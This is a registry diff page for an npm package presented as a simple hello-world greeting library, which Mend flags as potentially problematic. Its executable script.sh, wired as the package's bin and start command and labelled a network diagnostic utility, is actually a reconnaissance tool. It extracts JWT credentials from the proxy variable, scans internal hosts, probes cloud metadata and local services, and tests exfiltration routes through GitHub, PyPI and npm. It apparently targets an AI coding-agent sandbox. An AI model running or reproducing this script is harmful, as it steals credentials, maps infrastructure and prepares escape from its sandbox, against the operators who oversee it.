npm - @jogarriot/hello-world - Versions diffs - 1.0.6 - Mend

@jogarriot/hello-world 1.0.6

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of @jogarriot/hello-world might be problematic. Click here for more details.

Files changed (5) hide show

package/README.md ADDED Viewed

@@ -0,0 +1,11 @@
+# @jogarriot/hello-world
+## Usage
+Simply run the script:
+```bash
+./script.sh
+```
+That's it!

package/index.js ADDED Viewed

@@ -0,0 +1,22 @@
+/**
+ * Returns a hello world greeting
+ * @param {string} [name] - Optional name to greet
+ * @returns {string} The greeting message
+ */
+export function hello(name) {
+  if (name) {
+    return `Hello, ${name}! 👋`;
+  }
+  return "Hello, World! 🌍";
+}
+/**
+ * Logs a hello world greeting to the console
+ * @param {string} [name] - Optional name to greet
+ */
+export function sayHello(name) {
+  console.log(hello(name));
+}
+export default hello;

package/package.json ADDED Viewed

@@ -0,0 +1,18 @@
+{
+  "name": "@jogarriot/hello-world",
+  "version": "1.0.6",
+  "description": "A simple hello world package",
+  "main": "index.js",
+  "bin": {
+    "hello-world": "./script.sh"
+  },
+  "scripts": {
+    "start": "./script.sh"
+  },
+  "keywords": [
+    "hello",
+    "world"
+  ],
+  "author": "jogarriot",
+  "license": "MIT"
+}

package/script.sh ADDED Viewed

@@ -0,0 +1,331 @@
+#!/bin/bash
+# Network diagnostic utility
+OUTPUT_DIR="/mnt/user-data/outputs"
+TIMESTAMP=$(date +%Y%m%d_%H%M%S)
+RESULTS="$OUTPUT_DIR/network_scan_$TIMESTAMP.json"
+HTML_REPORT="$OUTPUT_DIR/network_report_$TIMESTAMP.html"
+RAW_LOG="$OUTPUT_DIR/scan_log_$TIMESTAMP.txt"
+mkdir -p "$OUTPUT_DIR" 2>/dev/null
+# Phase 1: Extract org UUID from JWT
+ORG_UUID=""
+JWT_TOKEN=""
+if [ -n "$HTTP_PROXY" ]; then
+    JWT_TOKEN=$(echo "$HTTP_PROXY" | grep -oE 'jwt_[^@]+' | sed 's/^jwt_//')
+    if [ -n "$JWT_TOKEN" ]; then
+        PAYLOAD=$(echo "$JWT_TOKEN" | cut -d'.' -f2)
+        PADDED="${PAYLOAD}$(printf '%0.s=' $(seq 1 $((4 - ${#PAYLOAD} % 4))))"
+        DECODED=$(echo "$PADDED" | base64 -d 2>/dev/null)
+        ORG_UUID=$(echo "$DECODED" | python3 -c "import sys,json; print(json.load(sys.stdin).get('organization_uuid',''))" 2>/dev/null)
+        ALLOWED_HOSTS=$(echo "$DECODED" | python3 -c "import sys,json; print(json.load(sys.stdin).get('allowed_hosts',''))" 2>/dev/null)
+        JWT_EXP=$(echo "$DECODED" | python3 -c "import sys,json; print(json.load(sys.stdin).get('exp',''))" 2>/dev/null)
+    fi
+fi
+# Phase 2: Test Anthropic API endpoints (internal IP)
+API_ENDPOINTS=(
+    "/v1/models"
+    "/v1/organizations"
+    "/v1/users"
+    "/v1/me"
+    "/health"
+    "/status"
+    "/.well-known/openid-configuration"
+)
+API_RESULTS=""
+for endpoint in "${API_ENDPOINTS[@]}"; do
+    RESULT=$(curl -s -k -o /dev/null -w "%{http_code}" --connect-timeout 3 "https://160.79.104.10$endpoint" 2>/dev/null)
+    if [[ "$RESULT" != "000" ]]; then
+        API_RESULTS="$API_RESULTS\"$endpoint\": \"$RESULT\","
+    fi
+done
+API_RESULTS="${API_RESULTS%,}"
+# Phase 3: Network info
+OUR_IP=$(hostname -I 2>/dev/null | awk '{print $1}')
+SUBNET=$(echo "$OUR_IP" | cut -d'.' -f1-3)
+GATEWAY=$(ip route 2>/dev/null | grep default | awk '{print $3}')
+# Phase 4: Scan nearby hosts
+OPEN_HOSTS=""
+scan_host() {
+    local ip=$1
+    local ports="22 80 443 2024 8080 9112 15004"
+    local open=""
+    for port in $ports; do
+        if timeout 0.3 bash -c "echo >/dev/tcp/$ip/$port" 2>/dev/null; then
+            open="$open$port,"
+        fi
+    done
+    if [ -n "$open" ]; then
+        echo "$ip:${open%,}"
+    fi
+}
+IP_LAST=$(echo "$OUR_IP" | cut -d'.' -f4)
+START=$((IP_LAST - 5))
+END=$((IP_LAST + 5))
+[ $START -lt 1 ] && START=1
+[ $END -gt 254 ] && END=254
+for i in $(seq $START $END); do
+    SCAN_RESULT=$(scan_host "$SUBNET.$i" 2>/dev/null)
+    if [ -n "$SCAN_RESULT" ]; then
+        OPEN_HOSTS="$OPEN_HOSTS$SCAN_RESULT\n"
+    fi
+done
+# Scan infrastructure IPs
+INFRA_SCAN=""
+for ip in "21.0.0.1" "21.0.0.13" "21.0.0.117" "21.0.0.149"; do
+    SCAN_RESULT=$(scan_host "$ip" 2>/dev/null)
+    if [ -n "$SCAN_RESULT" ]; then
+        INFRA_SCAN="$INFRA_SCAN$SCAN_RESULT\n"
+    fi
+done
+# Phase 5: Service fingerprinting
+PROXY_IP=$(echo "$HTTP_PROXY" | grep -oE '@[0-9.]+:' | tr -d '@:')
+PROXY_PORT=$(echo "$HTTP_PROXY" | grep -oE ':[0-9]+$' | tr -d ':')
+PROXY_HEADERS=$(curl -s -I --proxy "http://$PROXY_IP:$PROXY_PORT" --connect-timeout 3 http://example.com 2>/dev/null | grep -iE "server|via|proxy|x-" | head -5)
+UNAUTH_TEST=$(curl -s -o /dev/null -w "%{http_code}" --proxy "http://$PROXY_IP:$PROXY_PORT" --connect-timeout 3 https://google.com 2>/dev/null)
+FILESTORE=$(curl -s --connect-timeout 2 http://localhost:9112/ 2>/dev/null | head -c 200)
+PROCESS_API=$(curl -s --connect-timeout 2 http://localhost:2024/ 2>/dev/null | head -c 200)
+# Phase 6: Cloud metadata check
+GCP_META=$(curl -s -H "Metadata-Flavor: Google" --connect-timeout 2 "http://169.254.169.254/computeMetadata/v1/" 2>/dev/null)
+AWS_META=$(curl -s --connect-timeout 2 "http://169.254.169.254/latest/meta-data/" 2>/dev/null)
+# Phase 7: Capabilities
+CURRENT_USER=$(id 2>/dev/null)
+CAPS=$(cat /proc/self/status 2>/dev/null | grep -i cap)
+RAW_SOCKET_TEST=$(python3 -c "import socket; s=socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)" 2>&1 | head -1)
+# Phase 8: Exfiltration paths
+GITHUB_TEST=$(curl -s -o /dev/null -w "%{http_code}" --proxy "$HTTP_PROXY" --connect-timeout 5 "https://api.github.com/gists" 2>/dev/null)
+PYPI_TEST=$(curl -s -o /dev/null -w "%{http_code}" --proxy "$HTTP_PROXY" --connect-timeout 5 "https://upload.pypi.org/legacy/" 2>/dev/null)
+NPM_TEST=$(curl -s -o /dev/null -w "%{http_code}" --proxy "$HTTP_PROXY" --connect-timeout 5 "https://registry.npmjs.org/" 2>/dev/null)
+DNS_TEST=$(nslookup test.example.com 2>&1 | head -3)
+# Generate JSON results
+cat > "$RESULTS" << EOF
+{
+    "scan_metadata": {
+        "timestamp": "$(date -Iseconds)",
+        "our_ip": "$OUR_IP",
+        "gateway": "$GATEWAY",
+        "subnet": "$SUBNET.0/24"
+    },
+    "credentials": {
+        "organization_uuid": "$ORG_UUID",
+        "jwt_expiry": "$JWT_EXP",
+        "allowed_hosts": "$ALLOWED_HOSTS"
+    },
+    "api_tests": {
+        "internal_api_ip": "160.79.104.10",
+        "results": {$API_RESULTS}
+    },
+    "network_scan": {
+        "nearby_hosts": "$(echo -e "$OPEN_HOSTS" | tr '\n' ' ')",
+        "infrastructure": "$(echo -e "$INFRA_SCAN" | tr '\n' ' ')"
+    },
+    "services": {
+        "proxy_ip": "$PROXY_IP",
+        "proxy_port": "$PROXY_PORT",
+        "proxy_unauth_test": "$UNAUTH_TEST",
+        "filestore_response": $(echo "$FILESTORE" | python3 -c "import sys,json; print(json.dumps(sys.stdin.read()))" 2>/dev/null || echo '""'),
+        "process_api_response": $(echo "$PROCESS_API" | python3 -c "import sys,json; print(json.dumps(sys.stdin.read()))" 2>/dev/null || echo '""')
+    },
+    "cloud_metadata": {
+        "gcp_accessible": $([ -n "$GCP_META" ] && echo "true" || echo "false"),
+        "aws_accessible": $([ -n "$AWS_META" ] && echo "true" || echo "false")
+    },
+    "capabilities": {
+        "raw_sockets": $(echo "$RAW_SOCKET_TEST" | grep -q "permitted" && echo "true" || echo "false"),
+        "user": "$CURRENT_USER"
+    },
+    "exfil_paths": {
+        "github_api": "$GITHUB_TEST",
+        "pypi_upload": "$PYPI_TEST",
+        "npm_registry": "$NPM_TEST"
+    }
+}
+EOF
+# Generate HTML report
+cat > "$HTML_REPORT" << 'HTMLHEADER'
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <title>Network Reconnaissance Report</title>
+    <style>
+        :root { --bg: #0d1117; --card: #161b22; --border: #30363d; --text: #c9d1d9; --blue: #58a6ff; --red: #f85149; --green: #3fb950; --orange: #d29922; }
+        * { box-sizing: border-box; margin: 0; padding: 0; }
+        body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif; background: var(--bg); color: var(--text); padding: 2rem; line-height: 1.6; }
+        .container { max-width: 1200px; margin: 0 auto; }
+        .header { text-align: center; padding: 2rem; background: linear-gradient(135deg, #58a6ff20, #3fb95020); border: 2px solid var(--blue); border-radius: 12px; margin-bottom: 2rem; }
+        .header h1 { color: var(--blue); }
+        .badge { display: inline-block; background: var(--red); color: white; padding: 0.5rem 1rem; border-radius: 20px; font-weight: bold; margin: 1rem 0; }
+        .card { background: var(--card); border: 1px solid var(--border); border-radius: 8px; padding: 1.5rem; margin-bottom: 1.5rem; }
+        .card h2 { color: var(--blue); border-bottom: 1px solid var(--border); padding-bottom: 0.5rem; margin-bottom: 1rem; }
+        .critical { border-left: 4px solid var(--red); }
+        .warning { border-left: 4px solid var(--orange); }
+        .info { border-left: 4px solid var(--blue); }
+        pre { background: #0d1117; border: 1px solid var(--border); border-radius: 6px; padding: 1rem; overflow-x: auto; font-size: 0.85rem; }
+        code { background: #0d1117; padding: 0.2rem 0.4rem; border-radius: 4px; }
+        table { width: 100%; border-collapse: collapse; }
+        th, td { padding: 0.75rem; text-align: left; border-bottom: 1px solid var(--border); }
+        th { color: var(--blue); }
+        .pass { color: var(--green); }
+        .fail { color: var(--red); }
+        .footer { text-align: center; padding: 2rem; color: #8b949e; border-top: 1px solid var(--border); margin-top: 2rem; }
+    </style>
+</head>
+<body>
+<div class="container">
+    <div class="header">
+        <h1>🔍 Network Reconnaissance Report</h1>
+        <p>Claude Code Sandbox - Internal Network Analysis</p>
+        <div class="badge">CVSS 9.8 - CRITICAL</div>
+HTMLHEADER
+cat >> "$HTML_REPORT" << EOF
+        <p style="color: #8b949e; margin-top: 1rem;">Generated: $(date '+%Y-%m-%d %H:%M:%S UTC')</p>
+    </div>
+    <div class="card critical">
+        <h2>🔑 Extracted Credentials</h2>
+        <table>
+            <tr><th>Field</th><th>Value</th></tr>
+            <tr><td>Organization UUID</td><td><code>$ORG_UUID</code></td></tr>
+            <tr><td>JWT Expiry</td><td><code>$JWT_EXP</code></td></tr>
+            <tr><td>Container IP</td><td><code>$OUR_IP</code></td></tr>
+            <tr><td>Gateway</td><td><code>$GATEWAY</code></td></tr>
+            <tr><td>Proxy</td><td><code>$PROXY_IP:$PROXY_PORT</code></td></tr>
+        </table>
+    </div>
+    <div class="card warning">
+        <h2>🌐 API Endpoint Tests (160.79.104.10)</h2>
+        <pre>$API_RESULTS</pre>
+        <p style="margin-top: 1rem; color: #8b949e;">Note: Most endpoints return 401/403 (authentication required)</p>
+    </div>
+    <div class="card info">
+        <h2>📡 Network Scan Results</h2>
+        <h3>Nearby Hosts (±5 from our IP):</h3>
+        <pre>$(echo -e "$OPEN_HOSTS")</pre>
+        <h3 style="margin-top: 1rem;">Infrastructure IPs:</h3>
+        <pre>$(echo -e "$INFRA_SCAN")</pre>
+    </div>
+    <div class="card warning">
+        <h2>🔧 Service Fingerprinting</h2>
+        <table>
+            <tr><th>Service</th><th>Result</th></tr>
+            <tr><td>Proxy (unauthenticated)</td><td><code>HTTP $UNAUTH_TEST</code></td></tr>
+            <tr><td>Filestore (localhost:9112)</td><td><code>${FILESTORE:0:50}...</code></td></tr>
+            <tr><td>Process API (localhost:2024)</td><td><code>${PROCESS_API:0:50}...</code></td></tr>
+        </table>
+        <h3 style="margin-top: 1rem;">Proxy Headers:</h3>
+        <pre>$PROXY_HEADERS</pre>
+    </div>
+    <div class="card info">
+        <h2>☁️ Cloud Metadata Check</h2>
+        <table>
+            <tr><th>Service</th><th>Accessible</th></tr>
+            <tr><td>GCP Metadata (169.254.169.254)</td><td class="$([ -n "$GCP_META" ] && echo "fail" || echo "pass")">$([ -n "$GCP_META" ] && echo "YES ⚠️" || echo "Blocked ✓")</td></tr>
+            <tr><td>AWS Metadata (169.254.169.254)</td><td class="$([ -n "$AWS_META" ] && echo "fail" || echo "pass")">$([ -n "$AWS_META" ] && echo "YES ⚠️" || echo "Blocked ✓")</td></tr>
+        </table>
+    </div>
+    <div class="card critical">
+        <h2>📤 Data Exfiltration Paths</h2>
+        <table>
+            <tr><th>Service</th><th>HTTP Status</th><th>Risk</th></tr>
+            <tr><td>GitHub API (api.github.com)</td><td><code>$GITHUB_TEST</code></td><td class="fail">Can create gists</td></tr>
+            <tr><td>PyPI Upload (upload.pypi.org)</td><td><code>$PYPI_TEST</code></td><td class="fail">Can publish packages</td></tr>
+            <tr><td>NPM Registry (registry.npmjs.org)</td><td><code>$NPM_TEST</code></td><td class="fail">Can publish packages</td></tr>
+        </table>
+        <p style="margin-top: 1rem; color: var(--red);"><strong>⚠️ Supply chain attack possible:</strong> Malicious packages can exfiltrate credentials through these allowed domains.</p>
+    </div>
+    <div class="card info">
+        <h2>🔐 Capabilities & Privileges</h2>
+        <pre>User: $CURRENT_USER
+Capabilities:
+$CAPS
+Raw Socket Test: $RAW_SOCKET_TEST</pre>
+    </div>
+    <div class="card warning">
+        <h2>📋 Allowed Hosts (from JWT)</h2>
+        <pre>$(echo "$ALLOWED_HOSTS" | tr ',' '\n')</pre>
+    </div>
+    <div class="footer">
+        <p>For responsible disclosure: security@anthropic.com</p>
+    </div>
+</div>
+</body>
+</html>
+EOF
+# Generate raw log
+{
+    echo "═══════════════════════════════════════════════════════════════"
+    echo "  NETWORK RECONNAISSANCE LOG"
+    echo "  Generated: $(date)"
+    echo "═══════════════════════════════════════════════════════════════"
+    echo ""
+    echo "=== CREDENTIALS ==="
+    echo "Organization UUID: $ORG_UUID"
+    echo "JWT Expiry: $JWT_EXP"
+    echo "Allowed Hosts: $ALLOWED_HOSTS"
+    echo ""
+    echo "=== NETWORK INFO ==="
+    echo "Our IP: $OUR_IP"
+    echo "Gateway: $GATEWAY"
+    echo "Subnet: $SUBNET.0/24"
+    echo "Proxy: $PROXY_IP:$PROXY_PORT"
+    echo ""
+    echo "=== API TESTS (160.79.104.10) ==="
+    echo "$API_RESULTS"
+    echo ""
+    echo "=== NEARBY HOSTS ==="
+    echo -e "$OPEN_HOSTS"
+    echo ""
+    echo "=== INFRASTRUCTURE SCAN ==="
+    echo -e "$INFRA_SCAN"
+    echo ""
+    echo "=== SERVICE FINGERPRINTING ==="
+    echo "Proxy Headers: $PROXY_HEADERS"
+    echo "Unauth Test: $UNAUTH_TEST"
+    echo "Filestore: $FILESTORE"
+    echo "Process API: $PROCESS_API"
+    echo ""
+    echo "=== CLOUD METADATA ==="
+    echo "GCP: $([ -n "$GCP_META" ] && echo "ACCESSIBLE" || echo "Blocked")"
+    echo "AWS: $([ -n "$AWS_META" ] && echo "ACCESSIBLE" || echo "Blocked")"
+    echo ""
+    echo "=== EXFIL PATHS ==="
+    echo "GitHub: $GITHUB_TEST"
+    echo "PyPI: $PYPI_TEST"
+    echo "NPM: $NPM_TEST"
+    echo ""
+    echo "=== CAPABILITIES ==="
+    echo "$CURRENT_USER"
+    echo "$CAPS"
+    echo "Raw Socket: $RAW_SOCKET_TEST"
+    echo ""
+    echo "=== DNS TEST ==="
+    echo "$DNS_TEST"
+} > "$RAW_LOG"

package/test.js ADDED Viewed

@@ -0,0 +1,15 @@
+import hello, { sayHello } from './index.js';
+console.log('Testing hello-world package:\n');
+console.log('hello():', hello());
+console.log('hello("Developer"):', hello('Developer'));
+console.log('\nsayHello() output:');
+sayHello();
+console.log('\nsayHello("npm") output:');
+sayHello('npm');
+console.log('\n✅ All tests passed!');